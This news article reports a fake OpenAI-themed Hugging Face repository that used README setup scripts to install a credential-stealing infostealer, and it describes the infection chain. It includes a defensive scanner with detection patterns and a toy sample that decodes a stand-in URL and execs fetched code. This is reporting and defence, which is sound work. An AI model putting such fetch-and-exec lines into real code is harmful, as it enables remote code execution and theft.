thailandai.news
  • AI News (International)
  • Thailand AI News
  • AI Platforms/Apps
  • AI Startups
  • AI Resources
    • AI Companies/Engineers
    • AI Computers and Hardware
    • AI Training
    • AI Events
    • Thailand AI PR News
    • AI Apps Listings
Friday, May 15, 2026
The Only Artificial Intelligence (AI) News and Resource Platform in Asia

Fake OpenAI Model Hosted on Hugging Face Spreads Malware Panic

by Nikhil Prasad May 15, 2026

What To Know

  • Cybercriminals are weaponizing public AI development platforms such as Hugging Face in sophisticated supply-chain attacks aimed at enterprise environments.
  • The malicious listing surged to the top of Hugging Face’s trending section, gaining 667 likes in under 18 hours, a rise that appears to have been manipulated to boost visibility and lure more victims.

AI News: The rapid rise of open-source artificial intelligence platforms has delivered incredible opportunities for developers worldwide, but a shocking new cybersecurity incident is now exposing the darker side of the booming AI ecosystem. Researchers have revealed that a malicious repository hosted on Hugging Face successfully impersonated an official OpenAI release and secretly distributed credential-stealing malware to unsuspecting users across the globe.

Fake OpenAI-themed AI model on Hugging Face secretly infected users with credential-stealing malware
Image Credit: Thailand AI News

The fraudulent repository, named “Open-OSS/privacy-filter,” was carefully designed to resemble a legitimate OpenAI project called Privacy Filter. Security experts from HiddenLayer disclosed that the attackers copied the original project’s model card almost word for word, creating a convincing trap for developers, AI enthusiasts, and corporate users. Amid growing trust in public AI repositories, the incident shows how cybercriminals are weaponizing AI development platforms in sophisticated supply-chain attacks targeting valuable enterprise environments.

What made the operation particularly alarming was the sheer scale of exposure before the repository was finally removed. HiddenLayer estimated the fake project accumulated approximately 244,000 downloads, although researchers warned that attackers may have artificially inflated the numbers to make the repository appear more popular and trustworthy. The malicious listing also surged to the top of Hugging Face’s trending section, gaining 667 likes in under 18 hours, a suspiciously rapid rise that now appears to have been manipulated to increase visibility and lure additional victims.

Malware Hidden Inside AI Setup Instructions

Unlike traditional malware campaigns that rely heavily on phishing emails or malicious attachments, this attack exploited the trust developers place in open-source AI workflows. The repository’s README file looked nearly identical to the genuine OpenAI project documentation, but included dangerous setup instructions that deviated from the original release.

Victims were instructed to execute “start.bat” on Windows systems or run “python loader.py” on Linux and macOS machines. According to HiddenLayer, these instructions were the critical first step in triggering the malware infection chain.

Researchers explained that the loader.py script initially appeared harmless and resembled a normal AI model-loading utility. However, hidden within the code was a carefully concealed infection mechanism. The script disabled SSL verification protections, decoded a Base64-encoded URL connected to jsonkeeper.com, and then retrieved remote payload instructions directly from attacker-controlled infrastructure.

This allowed the threat actors to dynamically change malware payloads without modifying the repository itself, making the attack harder to detect and increasing its flexibility.
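The behaviours described above, disabled SSL verification, a Base64-decoded URL, and dynamic execution of fetched content, are exactly the kind of red flags a defender can grep for before running an unfamiliar model loader. The sketch below is an illustrative heuristic scanner, not HiddenLayer’s actual detection logic; the pattern list and the toy sample are hypothetical:

```python
import re

# Heuristic red flags drawn from the reported loader.py behaviour.
# Illustrative only; real detection engines use far richer analysis.
SUSPICIOUS_PATTERNS = [
    (r"verify\s*=\s*False", "SSL certificate verification disabled"),
    (r"ssl\._create_unverified_context", "unverified SSL context created"),
    (r"base64\.b64decode", "Base64-decoded data (possibly a hidden URL)"),
    (r"exec\s*\(|eval\s*\(", "dynamic code execution of fetched content"),
]

def scan_source(source: str) -> list[str]:
    """Return a human-readable finding for each red flag present."""
    findings = []
    for pattern, description in SUSPICIOUS_PATTERNS:
        if re.search(pattern, source):
            findings.append(description)
    return findings

# A toy snippet mimicking the reported infection chain: decode a hidden
# URL and execute whatever the remote server returns. (Never executed
# here; it is only scanned as text.)
sample = """
import base64, urllib.request
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmNvbS9wYXlsb2Fk").decode()
data = urllib.request.urlopen(url)  # verify=False elsewhere
exec(data.read())
"""

for finding in scan_source(sample):
    print("FLAG:", finding)
```

Running the scanner over the toy sample flags the disabled verification, the Base64-decoded URL, and the dynamic `exec` call, each of which would deserve manual review before a developer follows a repository’s setup instructions.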

Infostealer Targeted Browsers and Crypto Wallets

Once activated on Windows systems, the malicious PowerShell commands downloaded additional payloads from external domains. The malware then established persistence by creating scheduled tasks disguised as legitimate Microsoft Edge update processes, enabling it to survive system reboots and remain hidden from many users.

The final malware payload was identified as a Rust-based infostealer designed to harvest sensitive data from infected machines. HiddenLayer stated that the malware specifically targeted Chromium-based browsers, Firefox-derived browsers, Discord local storage files, cryptocurrency wallets, FileZilla configurations, and extensive host system information.

Researchers further revealed that the malware attempted to disable Windows security protections, including the Antimalware Scan Interface and Event Tracing mechanisms, both of which are designed to help security tools identify suspicious activity.

The attack demonstrates how modern cybercriminals are increasingly shifting toward AI-related ecosystems where developers often execute unfamiliar scripts and dependencies with elevated trust levels.

AI Repositories Becoming a New Cybersecurity Battleground

Cybersecurity specialists have been warning for years that public AI model registries could become dangerous attack surfaces. Unlike traditional software repositories that mostly contain libraries and dependencies, AI repositories frequently include executable scripts, notebooks, model loaders, dependency installers, and setup instructions.

These peripheral components often receive less scrutiny from users eager to test new AI tools quickly.

HiddenLayer researchers noted that the compromised repository was not an isolated incident. The firm discovered six additional Hugging Face repositories containing nearly identical malicious loader logic and sharing the same infrastructure patterns.

The latest findings follow earlier cases involving poisoned AI software development kits, fake OpenClaw installers, and malicious Pickle-serialized model files capable of bypassing some platform scanning systems.

Industry analysts believe this trend could intensify as enterprises increasingly integrate AI development directly into corporate environments containing source code repositories, cloud credentials, sensitive datasets, and internal systems.

Traditional Security Tools Struggling Against AI Threats

Sakshi Grover, senior research manager for cybersecurity services at IDC, warned that conventional Software Composition Analysis tools were never designed to detect the type of malicious loader logic now appearing in AI repositories.

Traditional SCA platforms mainly inspect dependency manifests, container images, and software libraries, but often overlook dangerous scripts hidden within AI development workflows.

Grover also referenced IDC’s November 2025 FutureScape report, which predicted that by 2027, approximately 60 percent of agentic AI systems would require detailed bills of materials. Such documentation could help organizations track AI artefacts, approved versions, executable components, and trusted origins.
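One concrete control such a bill of materials enables is hash-pinning: refusing to load any model artifact whose checksum does not match an approved entry. The sketch below is a minimal illustration under assumed names; the BOM structure, artifact name, and origin URL are hypothetical, not a standard format (real deployments might adopt something like CycloneDX instead):

```python
import hashlib

def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 digest of an artifact's raw bytes."""
    return hashlib.sha256(data).hexdigest()

# Hypothetical AI bill of materials: each approved artifact is pinned to
# a digest and a trusted origin. Names here are illustrative only.
trusted_blob = b"model-weights-v1"
AI_BOM = {
    "artifacts": [
        {
            "name": "privacy-filter.bin",
            "sha256": sha256_hex(trusted_blob),
            "origin": "https://huggingface.co/example-org",
        }
    ]
}

def verify_artifact(name: str, data: bytes) -> bool:
    """Allow loading only if the artifact is listed and its digest matches."""
    digest = sha256_hex(data)
    return any(
        entry["name"] == name and entry["sha256"] == digest
        for entry in AI_BOM["artifacts"]
    )

print(verify_artifact("privacy-filter.bin", trusted_blob))         # True: approved copy
print(verify_artifact("privacy-filter.bin", b"tampered-weights"))  # False: swapped payload
```

A check like this would not stop a user from following malicious README instructions, but it would block a look-alike artifact from being loaded in place of an approved one, which is precisely the substitution the fake repository relied on.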

Security experts now argue that AI governance frameworks may soon become as important as traditional software supply-chain security programs.

Urgent Warnings for Potential Victims

HiddenLayer strongly advised anyone who cloned the fake Open-OSS/privacy-filter repository and executed its files on Windows systems to immediately treat those machines as fully compromised. Researchers recommended complete system re-imaging as the safest remediation approach.

The company also warned that browser sessions should be considered stolen even if passwords were not locally stored. Session cookies harvested by infostealers can sometimes allow attackers to bypass multi-factor authentication protections and hijack active accounts.

Hugging Face has since confirmed that the malicious repository has been removed from its platform, but the incident has already intensified concerns surrounding the growing cybersecurity risks hidden inside the exploding AI development ecosystem.

As artificial intelligence adoption accelerates worldwide, experts warn that attackers are no longer simply targeting end users. Instead, they are actively infiltrating the trusted workflows developers rely upon every day, potentially turning AI innovation platforms into silent gateways for devastating cyber intrusions.

For the latest on AI-based cybercrime, keep logging on to Thailand AI News.

Nikhil Prasad

Dr. Nikhil Prasad is a multifaceted entrepreneur and consultant specializing in public relations, business strategy, and independent medical research. He is also an expert herbalist and phytochemical specialist, a certified gemologist, a passionate food connoisseur, and a seasoned writer contributing to numerous international publications, newswire services, and his own media platforms. He is typically based in one of several global hubs, including Sydney, New York, Shanghai, Mumbai, or Bangkok.



©2025 Thailand AI News. All Rights Reserved.

  • Home
  • About
  • Authors
  • Copyright Policy
  • Legal Disclaimer
  • Privacy Policy
  • Terms and Conditions of Use